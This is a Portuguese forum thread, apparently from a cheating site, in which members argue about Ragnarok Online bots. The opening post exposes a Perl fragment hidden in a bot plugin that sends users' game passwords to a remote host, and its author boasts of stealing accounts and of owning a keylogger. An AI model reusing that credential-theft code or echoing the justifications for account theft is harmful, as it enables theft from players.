Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

VOCÊ NÃO CONSEGUEM NOTAR? - Por Programdor10

Compartilhar

Posts Recomendados

Esperava que você e sua grandiosa equipe notase o script malicioso no bot do Araujo, ou devo dizer, Malechin?

Já sabia disso faz tempo, mas achava que vocês iam notar sem eu falar.

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Mesmo host do Araujo. Só esta em arquivo oculto na pasta dos plugins,

.

SINSERAMENTE, NEM ISSO VOCÊS NOTA? QUE EU ME DEI TRABALHO DE MOSTRAR NA VIDEO AULA QUE FIZ?? ¬¬'

E depois acham ruim quando eu consigo 200R$ hackeando apenas uma conta...

Link para o comentário
Compartilhar em outros sites

Malechin[/url]?

Já sabia disso faz tempo, mas achava que vocês iam notar sem eu falar.

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

$senha $kafra");

Mesmo host do Araujo. Só esta em arquivo oculto na pasta dos plugins,

.

SINSERAMENTE, NEM ISSO VOCÊS NOTA? QUE EU ME DEI TRABALHO DE MOSTRAR NA VIDEO AULA QUE FIZ?? ¬¬'

E depois acham ruim quando eu consigo 200R$ hackeando apenas uma conta...

O que você vai ganhar querendo bancar o bom samaritano agora mesmo que você venha posta isso aqui pra mostra que ele é o Araujo pra mim não faz a mínima diferença eu não confio nele mesmo e sim eu acredito que aqui no fórum existam pessoas com caráter que sim querem ajudar mais assim como existem os bons existem a escoria o lixo humano que só pensam na própria barriga que só sabem olha o próprio umbigo que não vêem um palmo a frente do nariz, e sim se você se pergunta de quem eu estou falando é de vocês mesmos bom chega cansei de digitar se eu for continuar vou escrever um livro.

Link para o comentário

Ele não está dando uma de Bonzinho e sim tirando uma com a nossa cara !

mas eu lavo minhas mãos,

eu NÃO BAIXEI O BOT DELE E MUITO MENOS RECOMENDEI A ALGUÉM,

pelo contrário eu falei para o frde tomar cuidado ao apoiar esses caras,

que eu ja duvidava que era o Araujo.

E aprenda a escrever(digitar) o Português correto.

Link para o comentário

O que você vai ganhar querendo bancar o bom samaritano agora mesmo que você venha posta isso aqui pra mostra que ele é o araujo pra mim não faz a minima diferença eu não confio nele mesmo e sim eu acredito que aqui no forum existam pessoas com carater que sim querem ajudar mais assim como exitem os bons existem a escoria o lixo humano que so pensam na propria barriga que so sabem olha o proprio humbigo que não veem um palmo a frente do nariz, e sim se voce se pergunta de quem eu estou falando é de vocês mesmos bom chega cansei de digitar se eu for continuar vou escrever um livro.[/size][/font][/color]

Não lembro querer bancar ser o mocinho da história...

Ok, vocês querem ajudar, e mesmo sendo a maioria, nem sempre conseguem o que querem... E quando consegue, é por tempo limitado =/

E sobre ser "o bem" e "o mal" é algo muito relativo.

No meio ponto de vista e de todos que são contra BOTs, vocês são o lixo humano que so pensam na propria barriga que so sabem olha o proprio humbigo que não veem um palmo a frente do nariz.

Diferente dos "outros" que citei, eu fico reagindo

mas eu lavo minhas mãos,

Mas você fez nada - ou melhor, quase nada, pois alertou o Frde, mas nem ajudou grandes coisas

Link para o comentário

Uma coisa que não existe aqui é o Bem,

podemos dizer que é Mal contra Mal,

nós somos usuários de Bot,

vc é usuario de Bot e além disso Ladrão,

ou seja é Cobra comendo Cobra aqui,

então não vem falar de ponto de vista,

pq quem ta mais errado aqui é vc.

Agora o fato de eu não ter feito nada,

de fato não fiz nada mesmo,

mas fiz minha parte,

alertei,

baixar e analisar ja seria outra coisa...

ja mal tenho tempo de estudar, pq trabalho,

quanto mais viver analisando coisa...

Link para o comentário

Não lembro querer bancar ser o mocinho da história...

Ok, vocês querem ajudar, e mesmo sendo a maioria, nem sempre conseguem o que querem... E quando consegue, é por tempo limitado =/

E sobre ser "o bem" e "o mal" é algo muito relativo.

No meio ponto de vista e de todos que são contra BOTs, vocês são o lixo humano que so pensam na propria barriga que so sabem olha o proprio humbigo que não veem um palmo a frente do nariz.

Diferente dos "outros" que citei, eu fico reagindo

Mas você fez nada - ou melhor, quase nada, pois alertou o Frde, mas nem ajudou grandes coisas

Cara eu tiro meu chapéu pra quem não usa bot. No Ragnarok houve um tempo que eu tinha em minha mente esse pensamento de não usa programas para mi beneficiar no Ragnarok mais a falta de respeito por parte de gente como você era tanta alem do numero exagerado de bot eles ainda dão KS a rodo eu comecei a pensar diferente já que a nossa querida LUG não da o passo a frente, agora não me venha você se colocar na mesma posição dos Players "honestos" do jogo, por que de todos aqui como disse o god odin você é o mais errado! E por incrível que pareça tem a cara de pau de se intitula correto ate parece que não tem espelho em casa.

Link para o comentário

Uma coisa que não existe aqui é o Bem,

podemos dizer que é Mal contra Mal,

nós somos usuários de Bot,

vc é usuario de Bot e além disso Ladrão,

ou seja é Cobra comendo Cobra aqui,

então não vem falar de ponto de vista,

pq quem ta mais errado aqui é vc.

Agora o fato de eu não ter feito nada,

de fato não fiz nada mesmo,

mas fiz minha parte,

alertei,

baixar e analisar ja seria outra coisa...

ja mal tenho tempo de estudar, pq trabalho,

quanto mais viver analisando coisa...

Não uso BOT.

Usei só por três dias para aprender o método de combate-lo (e em conta fak).

Pareceu o Araujo: usando argumentos sem fundamento

Cara eu tiro meu chapéu pra quem não usa bot. No Ragnarok houve um tempo que eu tinha em minha mente esse pensamento de não usa programas para mi beneficiar no Ragnarok mais a falta de respeito por parte de gente como você era tanta alem do numero exagerado de bot eles ainda dão KS a rodo eu comecei a pensar diferente já que a nossa querida LUG não da o passo a frente, agora não me venha você se colocar na mesma posição dos Players "honestos" do jogo, por que de todos aqui como disse o god odin você é o mais errado! E por incrível que pareça tem a cara de pau de se intitula correto ate parece que não tem espelho em casa.[/font][/color]

Não é só por que outros ficam errando que você deve imita-los (que argumento sem sentido ¬¬')

E outra, continuo com minha filosofia que o termo certo e errado varia de pessoa para pessoa.

"O certo é aquilo que na mente da pessoa faz a partir de um ideal, não necessariamente compartilhado" (acabei de inventar essa frase '-')

Link para o comentário

Não uso BOT.

Usei só por três dias para aprender o método de combate-lo (e em conta fak).

Pareceu o Araujo: usando argumentos sem fundamento

Não é só por que outros ficam errando que você deve imita-los (que argumento sem sentido ¬¬')

E outra, continuo com minha filosofia que o termo certo e errado varia de pessoa para pessoa.

"O certo é aquilo que na mente da pessoa faz a partir de um ideal, não necessariamente compartilhado" (acabei de inventar essa frase '-')

Argumento fraco é o seu vem aqui dizer que não usa bot e logo depois faz uma afirmação que uso por três meses essa e de doer à barriga. Outra coisa você quer combater quem deixa de ser estúpido cara você é só uma formiga no meio do olho de uma imensa tempestade, quem tem que tomar uma atitude não é você e sim a empresa que fornece o serviço no caso aqui é nossa querida LUG você é só mais um querendo se dar bem usando openkore fica tirando onde de certinho como você mesmo disse que ganha 200R$ por conta roubada bom pra conseguir roubar as contas você necessita do programa o qual você diz não ser usuário, bom eu digo e repito não existe nobreza em sua atitude.

Link para o comentário

Argumento fraco é o seu vem aqui dizer que não usa bot e logo depois faz uma afirmação que uso por três meses essa e de doer à barriga. Outra coisa você quer combater quem deixa de ser estúpido cara você é só uma formiga no meio do olho de uma imensa tempestade, quem tem que tomar uma atitude não é você e sim a empresa que fornece o serviço no caso aqui é nossa querida LUG você é só mais um querendo se dar bem usando openkore fica tirando onde de certinho como você mesmo disse que ganha 200R$ por conta roubada bom pra conseguir roubar as contas você necessita do programa o você diz não ser usuário, bom eu digo e repito não existe nobreza em sua atitude.[/font][/color]

Leia novamente, eu disse TRÊS DIAS

Pode ver que nem editei o post ¬¬'

E outra, não é só por conta deles não levantarem a bunda que devo ficar nessa também.

É melhor reagir começando uma iniciativa do que ficar paradão, só bebendo cerveja, vendo Globo e reclamando do sistema (algo próximo do que você faz)

E sim, mereço salário - acha que é facil manter atualizado um programa, começar ele do zero e aturar pessoas como você? =/

E outra, disse que eu ganhei 200R$ em certas contas...

E não existe nobreza em sua atitude também, eta hipocrisia sua '-'

(sim, eu quis abusar do E)

Link para o comentário

ele está mentido quando disse que ganho 200 reais aqui,essas contas que todos usam são todas de membros nubs que não tem praticamente nd na conta,esse suzaku é um coitado punhetero que fica enchendo o povo na net

Link para o comentário

Uma frase resume bem oque ta rolando aqui "Honra entre ladrões" podemos trapaciar com os bots mas não roubamos nada de ninguem, nem itens nem zeny, sim podemos não estar fazendo oque é certo mas tirar as coisas dos outro é pior que isso, sem duvida quem rouba itens e zeny de contas usa bot tambem...

Link para o comentário

Quando foi que eu disse que tinha nobreza em minha atitude, eu só afirmei que a sua atitude não é diferente da minha a diferença entre eu é você e exatamente essa eu sei que to errado em usa o programa mais não fico inventando desculpas pra dizer o contrario errado é errado e pronto. Você uso o programa pros fins que você julga ser correto mais isso não faz de você o certo da historia se podemos aqui assim afirmar somos todos farinha do mesmo saco.

Link para o comentário

Uma frase resume bem oque ta rolando aqui "Honra entre ladrões" podemos trapaciar com os bots mas não roubamos nada de ninguem, nem itens nem zeny, sim podemos não estar fazendo oque é certo mas tirar as coisas dos outro é pior que isso, sem duvida quem rouba itens e zeny de contas usa bot tambem...

Não sou ladrão, apenas sigo meus ideais - o que tem de mais nisso?

Sempre que você comete algum ato indevido, você rouba (sim, peguei isso do filme Caçador de Pipas):

• Se você matar alguem rouba o direito do outro de viver;
  • se você trapaceia em jogos rouba o direito dos outros de se divertirem da maneia justa

BOT, mesmo que não de KS, incomoda não?

MENTIRA! Vá matar nos esporos e veja como é ruim!

Vá para Comodo e veja como só tem concorrencia!

Vá comprar os preços dos itens de Odim com Thor!

Depois disso, venha falar que BOT não atrapalha a diversão!

Quando foi que eu disse que tinha nobreza em minha atitude, eu só afirmei que a sua atitude não é diferente da minha a diferença entre eu é você e exatamente essa eu sei que to errado em usa o programa mais não fico inventando desculpas pra dizer o contrario errado é errado e pronto. Você uso o programa pros fins que você julga ser correto mais isso não faz de você o certo da historia se podemos aqui assim afirmar somos todos farinha do mesmo saco.[/font][/color]

O que eu digo não é desculpa, é a verdade.

Agora, se vai concordar comigo ou não, é outra história.

Mas diga a verdade: você esta agindo feito os deputados corruptos contra a ficha limpa.

Se você fosse um cidadão que não se envolve diretamente com a política, certamente apoiaria a ficha limpa. Mas se fosse um político corrupto, seria contra a ficha limpa.

Etendeu a metáfora?

PS: Deixei em negrito erros de português no seu post.

Depois vem falar para eu corrigir os meus... Ok, você não falou que é mestre no português.......................

Link para o comentário

Não sou ladrão, apenas sigo meus ideais - o que tem de mais nisso?

Sempre que você comete algum ato indevido, você rouba (sim, peguei isso do filme Caçador de Pipas):

• Se você matar alguem rouba o direito do outro de viver;
  • se você trapaceia em jogos rouba o direito dos outros de se divertirem da maneia justa

BOT, mesmo que não de KS, incomoda não?

MENTIRA! Vá matar nos esporos e veja como é ruim!

Vá para Comodo e veja como só tem concorrencia!

Vá comprar os preços dos itens de Odim com Thor!

Depois disso, venha falar que BOT não atrapalha a diversão!

O que eu digo não é desculpa, é a verdade.

Agora, se vai concordar comigo ou não, é outra história.

Mas diga a verdade: você esta agindo feito os deputados corruptos contra a ficha limpa.

Se você fosse um cidadão que não se envolve diretamente com a política, certamente apoiaria a ficha limpa. Mas se fosse um político corrupto, seria contra a ficha limpa.

Etendeu a metáfora?

PS: Deixei em negrito erros de português no seu post.

Depois vem falar para eu corrigir os meus... Ok, você não falou que é mestre no português.......................

Tomou pinga ou bebeu urina? Quem disse isso foi o odim meu caro não fico porá e corrigindo ninguém não por que isso não e da minha conta e sim eu entendi a metáfora mais mesmo assim não vou apoiar sua atitude seria o mesmo que dizer que milícia e mesma coisa que policia entenderam, o dia que a LUG colocar alguém sério pra trabalha como ADM do Thor até eu vou respeitar por que uma solução muito simples e rápida seria bani por IP pego um pego todo mundo.

Concordo com você no fato que bot incomoda porque mesmo eu que uso sinto raiva só de ver aquela quantidade de bot nos esporos não só nos esporos e ADM nem um faz nada daquela merda eles simplesmente se fingem de cegos. O vai dizer que se você fosse um GM e vise aquilo você ia se fingir de cego também, uma coisa e certa ta precisando de uma solução radical esse servidor.

Link para o comentário

Tomou pinga bebeu urina? Quem disse isso foi o odim meu caro não fico porá e corrigindo ninguém não por que isso não e da minha conta e sim eu entendi a metáfora mais mesmo assim não vou apoiar sua atitude seria o mesmo que dizer que milícia e mesma coisa que policia entenderam, o dia que a LUG colocar alguém sério pra trabalha como ADM do Thor até eu vou respeitar por que uma solução muito simples e rápida seria bani por IP pego um pego todo mundo.

Concordo com você no fato que bot incomoda porque mesmo eu que uso sinto raiva só de ver aquela quantidade de bot nos esporos não só nos esporos e ADM nem uma daquela merda eles simplesmente se fingem de cegos. O vai dizer que se você fosse um GM e vise aquilo você ia se fingir de cego também, uma coisa e certa ta precisando de uma solução radical esse servidor.

O que tem haver Odim? Disse para comprar os preços de Thor com Odim pelo fato de lá ter menos BOTs. Ok, ok, tem bem menos gente, mas mesmo assim, vá comprar o preço dos morangos, por exemplo ¬¬'

Sobre banir por IP, isso é algo inutil: em 2m no Google se aprende a mudar o IP, mesmo com internet via rádio, e muitas, muitas conexões são compartilhada, tendo o mesmo IP, principalmente as péssimas (como a 3G da Oi(

Sobre os probemas dos GM's.... Os GM's não mudam a anos. Eles até poderiam ter mais tempo antigamente, quando foram contratados, mas agora, nem se sabe da vida deles; quem sabe se morreram e ninguem ficou sabendo? Da forma que não há transparencia...

Link para o comentário

Ja que você não saco a do odim eu vo explicar ou melhor vou mostrar e vo para por aqui com essa prosa. To pensando sériamente em pendurar minha chuteiras no ragnarok mesmo pra mim esse jogo ja deu o que tinha pra dar e é motivo ate de descordia entre pessoas que mau se conhecem.

mas eu lavo minhas mãos,

Link para o comentário

ele está mentido quando disse que ganho 200 reais aqui,essas contas que todos usam são todas de membros nubs que não tem praticamente nd na conta,esse suzaku é um coitado punhetero que fica enchendo o povo na net

Pela primeira vez vou concordar com o Araujo. :aplauso:

@Programador10

Vc está certo na teoria,

porém o mesmo que o benner passou eu também passei,

eu desprezava qualquer tipo de Hack ou Cheat,

porém pra toda paciência tem limite,

e uma hora eu comecei a utilizar Bot também,

pois é impossível upar em meio as Farm's...

porém eu sou consciente,

uso para Upar,

não coloco 15~20 Bots por ai,

como os Grandes Botter's fazem,

pois são eles que atrapalham a jogabilidade,

como disseram vc é apenas uma Gota no Oceano,

a empresa que deveria tomar providencia,

roubar é errado de qualquer forma,

pense comigo,

o Brasil é corrupto,

muitos empregos deixam de ser gerados por isso,

um desempregado vai e rouba sua casa,

é certo ou errado ?

ele vai estar roubando pro sustento...isso deixa de ser errado ?

NÃO.

Link para o comentário

Vai parar por qual motivo?

No mínimo, o fato de ter muitos bots influenciou...

E depois vem reclamar de pessoas como eu =/

Bom com certeza se eu jogase ragnarok do mesmo jeito que eu jogava a uns 7 anos atraz quando não existia bot hoje eu pararia por causa dos bot, mas como não jogo com mesmo vigor posso aqui afirma não upei 1 level sequer com meus proprios dedos ate o lvl 130 assim como também tenho um bot de fazer grana lvl 115 sicario um Desordeiro 99 fiz ate um warlock nessas ultimas 3 semanas ele ta no lvl 105 sem conta os outros que estao entre os leveis 70 e 95 pra voce ver a incopetencia dos GM's dessa bosta de servido, agora nesse exato momento posso te afirmar que se eu fosse comercializar eu faria bem mais dinhero do que vc sonharia fazer. bom como eu não fui banido ou hackeado ate hoje é como o god odin falo você pode pegar os leigos mais os grandes boters... E é isso ae cara você pode espernia chorar hackea quantos você consguir mais isso não resolve se você não corta o mau pela raiz. Não esto falando que so o pica das galaxias so to falando que conheço bem openkore a ponto de não ser haceado por alguem que pego o programa e diz ter mexido nele por apena 3 dias isso prova que é um exinio programador o que não é o meu caso que so apena um curiozo nesse ramo bom ja escrevi demais. Ainda continuarei tirando as duvidas de que quizer se arriscar no universo openkore mais joga ragnarok ja nem sei se vale mais apena.

Link para o comentário

Bem, eu só digo uma coisa, vocês estão num site de Hackers, e aquele que meche com hacker tem de ter sérias consequencias se nao for muito esperto, seria a mesma coisa de alguem entrar numa floresta cheia de serpentes e pensar que não vai ser picado.

Ou seja, antes de você entrar num forum como esse, tenha um pouco de experiencia como hacker ou programação para se previnir, ou se quizer fazer melhor, faça voce mesmo um hacker, pois ninguem faz nada de graça hoje em dia =/, hoje quem faz alguma coisa, faz em troca de algo =P.

Link para o comentário

Se vocês não perceberam até agora, o programador10 está querendo dizer que aqui ninguém se dá conta pelo o que baixa, e que os ADM'S não estão nem aí. Mas como assim?

É simples, chega um noob qualquer q pesquisou no google (colocáh keyloggui nu opencore!!!11), aí o kra vai la põe o bot e talz, chega um noob e vê q funciona, aí a nubada vai almentando vai almentando ...

E só digo uma coisa, para os preguiçosos que ficam direto esperando q alguem coloque hacker q preste seja de qualquer jogo, vai se acostumando com keyloger, pois eu acredito que nenhum hacker de verdade seja burro o suficiente para postar de graça para um bando de sem noção só por aplausos, ou vocês pensam q o kra vai se matar descobrindo um hacker e postar aqui para ganhar "pontinhos"?

Antes de falar merd4 de mim, reflita você mesmo, e antes de falar mal do fórum (não que esteja falando de alguem aí de cima LoL) saibam que aqui é um site de HACKER, ou seja, hackers fazem isso mesmo, hackeiam =P.

Só peço para que tomem muito cuidado com o que vcs baixam "Tudo que vem facil vai facil".

N vo mais escrever se n vo tomar o forum todo kkkk, mas acho q ja deu ne pessoal, mão na consciência, toda ação tem uma reação \o/.

Se lhe serve como resposta eu to aqui não pra tirar dos outro ate por que eu não preciso to muito satisfeito com minha possição proficional conheço as maneiras usadas para hackea mais não uso por que isso vai contra meus ideais um hacker tem que ter principios assim como os Hacker de verdade ou voce ver algum hacker por ae tirando de que não tem nada, só um bundão faria isso axo ate que nem deveriam ser chamados de hacker esses que tiram o pouco que alguns conseguem essa palavra pra mim quem a tem como titulo tem que merecer, hacker e um titulo de muito peso pro pobre do programador 10 carregar assim como os demais ele so conhece uma maneira de pega contas dos outros em um joguinho.

Link para o comentário

Se lhe serve como resposta eu to aqui não pra tirar dos outro ate por que eu não preciso to muito satisfeito com minha possição proficional conheço as maneiras usadas para hackea mais não uso por que isso vai contra meus ideais um hacker tem que ter principios assim como os Hacker de verdade ou voce ver algum hacker por ae tirando de que não tem nada, só um bundão faria isso axo ate que nem deveriam ser chamados de hacker esses que tiram o pouco que alguns conseguem essa palavra pra mim quem a tem como titulo tem que merecer, hacker e um titulo de muito peso pro pobre do programador 10 carregar assim como os demais ele so conhece uma maneira de pega contas dos outros em um joguinho. [/color][/font]

Concordo com você benner, pois um hacker bom mesmo não se exibiria desse geito, e além disso, não é qualquer um q merece esse titulo, mas poucos sabem disso Uu.

Link para o comentário

Tantas postagens...

Bem.... Vo responder todas.....

Pela primeira vez vou concordar com o Araujo. :aplauso:

@Programador10

Vc está certo na teoria,

porém o mesmo que o benner passou eu também passei,

eu desprezava qualquer tipo de Hack ou Cheat,

porém pra toda paciência tem limite,

e uma hora eu comecei a utilizar Bot também,

pois é impossível upar em meio as Farm's...

porém eu sou consciente,

uso para Upar,

não coloco 15~20 Bots por ai,

como os Grandes Botter's fazem,

pois são eles que atrapalham a jogabilidade,

como disseram vc é apenas uma Gota no Oceano,

a empresa que deveria tomar providencia,

roubar é errado de qualquer forma,

pense comigo,

o Brasil é corrupto,

muitos empregos deixam de ser gerados por isso,

um desempregado vai e rouba sua casa,

é certo ou errado ?

ele vai estar roubando pro sustento...isso deixa de ser errado ?

NÃO.

Se levar em conta que a minha punição é bem mais leve que a dos GM's (que fecham a contam por 5 anos), pois levo apenas os itens e zeny, RARAMENTE a conta (acha que vó deixar passar um shura lvl 119, por exemplo?) e quando deleto os peronsagens, é apenas em conta full bot (apenas arruaceiro ou sacer)...

Outra, sim, seria certo ele roubar CASO EU TENHA ROUBADO ELE ANTES.

Eu poderia muito bem sim hackear qual quer conta de forma aleatória, mas não, me restringir apenas às de BOT (se eu colocase meu keylog priv8 que fiz na lanhouse, conseguiria contas de jogos bem rapidamente)

Deixei de ganhar dinheiro? Sim

Continuei seguindo meus ideais? Sim

Fiz algo de errado? Não

E esse seu argumento de "paciencia tem limite"... Ah vá ¬¬'

Bom com certeza se eu jogase ragnarok do mesmo jeito que eu jogava a uns 7 anos atraz quando não existia bot hoje eu pararia por causa dos bot, mas como não jogo com mesmo vigor posso aqui afirma não upei 1 level sequer com meus proprios dedos ate o lvl 130 assim como também tenho um bot de fazer grana lvl 115 sicario um Desordeiro 99 fiz ate um warlock nessas ultimas 3 semanas ele ta no lvl 105 sem conta os outros que estao entre os leveis 70 e 95 pra voce ver a incopetencia dos GM's dessa bosta de servido, agora nesse exato momento posso te afirmar que se eu fosse comercializar eu faria bem mais dinhero do que vc sonharia fazer. bom como eu não fui banido ou hackeado ate hoje é como o god odin falo você pode pegar os leigos mais os grandes boters... E é isso ae cara você pode espernia chorar hackea quantos você consguir mais isso não resolve se você não corta o mau pela raiz. Não esto falando que so o pica das galaxias so to falando que conheço bem openkore a ponto de não ser haceado por alguem que pego o programa e diz ter mexido nele por apena 3 dias isso prova que é um exinio programador o que não é o meu caso que so apena um curiozo nesse ramo bom ja escrevi demais. Ainda continuarei tirando as duvidas de que quizer se arriscar no universo openkore mais joga ragnarok ja nem sei se vale mais apena. [/font][/color]

Assim como você se aproveita do descaso dos GM's com o Ragnarok, eu aproveito o descaso da moderação da staff do WebCheats com essa área.

Notou que somos iguais nesse sentido? ^^

Bem, eu só digo uma coisa, vocês estão num site de Hackers, e aquele que meche com hacker tem de ter sérias consequencias se nao for muito esperto, seria a mesma coisa de alguem entrar numa floresta cheia de serpentes e pensar que não vai ser picado.

Ou seja, antes de você entrar num forum como esse, tenha um pouco de experiencia como hacker ou programação para se previnir, ou se quizer fazer melhor, faça voce mesmo um hacker, pois ninguem faz nada de graça hoje em dia =/, hoje quem faz alguma coisa, faz em troca de algo =P.

Ainda há quem faz materiais de qualidade sim, pois isso ajuda a subir.

Se eu tivese guardado todo meu conhecimento, teria subido bem mais devagar, pois conheci pessoas que me ajudaram, tive acesso à mais informações...

Esses pontinhos fazem a diferença.

Se lhe serve como resposta eu to aqui não pra tirar dos outro ate por que eu não preciso to muito satisfeito com minha possição proficional conheço as maneiras usadas para hackea mais não uso por que isso vai contra meus ideais um hacker tem que ter principios assim como os Hacker de verdade ou voce ver algum hacker por ae tirando de que não tem nada, só um bundão faria isso axo ate que nem deveriam ser chamados de hacker esses que tiram o pouco que alguns conseguem essa palavra pra mim quem a tem como titulo tem que merecer, hacker e um titulo de muito peso pro pobre do programador 10 carregar assim como os demais ele so conhece uma maneira de pega contas dos outros em um joguinho. [/color][/font]

Se referio a algum hacker? Quem?

Araujo esta longe de ser um, eu não me considero (já cancei de falar isso ¬¬')... No máximo, me considero gray hat, mas hacker... NÃO.

CONTINUO COM O MESMO ARGUMENTO QUE JÁ CITEI ANTES:

E outra, não é só por conta deles não levantarem a bunda que devo ficar nessa também.

É melhor reagir começando uma iniciativa do que ficar paradão, só bebendo cerveja, vendo Globo e reclamando do sistema (algo próximo do que você faz)

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.